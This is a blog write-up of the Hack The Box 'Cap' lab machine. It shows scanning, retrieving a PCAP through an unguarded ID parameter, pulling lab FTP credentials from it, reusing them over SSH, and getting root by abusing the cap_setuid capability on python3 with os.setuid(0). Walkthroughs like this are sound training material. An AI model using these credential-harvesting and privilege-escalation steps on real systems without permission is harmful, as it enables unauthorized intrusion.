Post

HTB Cap Writeup

INFO

Machine IP = 10.10.10.245
OS = Linux
Level = EASY
Points = 20

Write the IP of the machine to your /etc/hosts file

1
echo "10.10.10.245 cap.htb" >> /etc/hosts

Scanning

1
nmap -sC -sV 10.10.10.245

Enumeration

1
2
3
4
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    gunicorn

FTP (Port 21)

FTP anonymous login not available

HTTP (Port 80)

1
http://10.10.10.245/

I found for each time on reload or click on tab Security Snapshot (5 Second PCAP + Analysis)
the variable ID changed and with each time the PCAP file changed no one of them usefull so let’s try with the value 0

1
http://10.10.10.245/data/0

Then I downloaded 0.PCAP file and opened it with wireshark here we can found FTP credentials as below:

USER : nathan
PASSSWORD : Buck3tH4TF0RM3!

With these credentials we going to login to the FTP
we got first flag user.txt

Let’s use same credentials for SSH

1
ssh [email protected] -> with password: Buck3tH4TF0RM3!

Privilege Escalation

Here we going to clone this script linpeas.sh

Then we found
Files with capabilities (limited to 50):

1
/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip

This means that it’s possible to set the effective user id of the created process

Time to privilege escalation

1
2
3
4
5
6
7
8
nathan@cap:~$ python3
Python 3.8.5 (default, Jan 27 2021, 15:41:15) 
[GCC 9.3.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> import os
>>> os.setuid(0)
>>> os.system("/bin/bash")
root@cap:~#

Done!


Hi there 👋 Support me!

Life is an echo—what you send out comes back.

Donate

This post is licensed under CC BY 4.0 by the author.